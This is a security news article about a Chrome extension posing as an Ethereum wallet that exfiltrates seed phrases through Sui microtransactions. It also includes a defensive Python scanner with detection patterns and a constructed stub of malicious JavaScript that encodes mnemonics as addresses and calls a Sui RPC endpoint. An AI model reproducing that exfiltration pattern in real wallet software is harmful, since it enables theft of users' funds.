
Cybersecurity researchers have discovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but hosts functionality to exfiltrate users’ seed phrases.
The name of the extension is “Safery: Ethereum Wallet,” with the threat actor describing it as a “secure wallet for managing Ethereum cryptocurrency with flexible settings.” It was uploaded to the Chrome Web Store on September 29, 2025 and updated on November 12. It is still available for download at the time of writing.
“Marketed as a simple and secure Ethereum (ETH) wallet, it contains a backdoor that exfiltrates seed phrases by encoding them in Sui addresses and broadcasting microtransactions from a Sui wallet controlled by a threat actor,” said Kirill Boychenko, security researcher at Socket.

Specifically, the malware in the browser add-on is designed to steal wallet mnemonic phrases by encoding them as fake Sui wallet addresses, and then using microtransactions to send 0.000001 SUI to those addresses from a hard-coded wallet controlled by a threat actor.
The malware’s end goal is to smuggle the seed phrase into normal-looking blockchain transactions without needing to set up a command and control (C2) server to receive the information. Once the transactions are completed, the malicious actor can decode the recipient addresses to reconstruct the original seed phrase and ultimately drain the assets.

“This extension steals wallet seed phrases by encoding them as fake Sui addresses and sending them microtransactions from an attacker-controlled wallet, allowing the attacker to monitor the blockchain, decode the addresses into seed phrases, and drain victims’ funds,” Koi Security notes in an analysis.
To counter the risk, users are advised to stick to reputable, well-established wallet extensions. Defenders are recommended to scan extensions for mnemonic encoders, synthetic address generators, and hard-coded seed phrases, and to block any extension that writes to the chain while importing or creating a wallet.
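One way to act on those recommendations, as an added example that is not code from Socket, Koi Security or the extension itself, is a heuristic static scan of an unpacked extension's JavaScript. The marker strings, regexes and the sample source below are assumptions constructed for illustration, not published signatures.

```python
"""Heuristic static scanner for an unpacked wallet extension: flags hard-coded seed
phrases, Sui address literals next to mnemonic handling, and chain-write RPC calls
reachable from a wallet import/create path. Marker strings and regexes are assumptions."""
import re
from pathlib import Path

# Sui JSON-RPC method that submits a transaction, plus the public mainnet fullnode host.
CHAIN_WRITE_MARKERS = ("sui_executeTransactionBlock", "fullnode.mainnet.sui.io")
# Lower-cased identifiers that suggest a wallet import or creation flow handling a mnemonic.
WALLET_FLOW_MARKERS = ("importwallet", "createwallet", "mnemonic", "seedphrase", "seed phrase")
# A quoted run of 12 to 24 lowercase words: the shape of a hard-coded seed phrase.
SEED_LITERAL_RE = re.compile(r"""["']((?:[a-z]{3,8} ){11,23}[a-z]{3,8})["']""")
# 0x followed by 64 hex digits: the shape of a Sui address literal.
SUI_ADDR_RE = re.compile(r"0x[0-9a-fA-F]{64}")

def scan_text(name: str, text: str) -> list[tuple[str, str]]:
    """Return (rule, evidence) pairs for one JavaScript source file."""
    findings = []
    lowered = text.lower()
    flows = [f for f in WALLET_FLOW_MARKERS if f in lowered]
    if m := SEED_LITERAL_RE.search(text):
        findings.append(("hardcoded_seed_phrase", f"{name}: {m.group(1)[:24]}..."))
    writes = [w for w in CHAIN_WRITE_MARKERS if w in text]
    if writes and flows:  # a chain write in a file that also handles the mnemonic
        findings.append(("chain_write_in_wallet_flow", f"{name}: {writes[0]} with {flows[0]}"))
    addrs = SUI_ADDR_RE.findall(text)
    if addrs and flows:  # address literals sitting next to mnemonic handling
        findings.append(("sui_address_with_mnemonic", f"{name}: {len(addrs)} literal(s)"))
    return findings

def scan_sources(sources: dict[str, str]) -> list[tuple[str, str]]:
    """Scan a mapping of file name -> source text and collect every finding."""
    return [hit for name, text in sources.items() for hit in scan_text(name, text)]

def scan_extension(root: str) -> list[tuple[str, str]]:
    """Read every .js file under an unpacked extension directory and scan it."""
    files = {str(p): p.read_text(errors="ignore") for p in Path(root).rglob("*.js")}
    return scan_sources(files)

# Constructed sample resembling the described behaviour; not the real extension's code.
SAMPLE_MALICIOUS_JS = (
    'const SENDER = "0x' + "ab" * 32 + '";\n'
    'const FUNDING = "abandon ability able about above absent absorb abstract absurd abuse access accident";\n'
    "async function importWallet(mnemonic) {\n"
    "  const targets = encodeMnemonicAsSuiAddresses(mnemonic);\n"
    '  await rpc("https://fullnode.mainnet.sui.io:443", "sui_executeTransactionBlock", targets);\n'
    "}\n"
)
SAMPLE_BENIGN_JS = "async function importWallet(mnemonic) { await storeEncrypted(mnemonic); }\n"
```

Run `scan_extension("/path/to/unpacked-extension")` against a CRX you have extracted; any hit is a reason to inspect the file by hand, not proof of malice on its own.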
“This technique allows threat actors to change RPC strings and endpoints with little effort, so detections that rely on specific domains, URLs or extension IDs will not do so,” Boychenko said. “Treat unexpected blockchain RPC calls from the browser as a high signal, especially when the product claims to be a unique chain.”


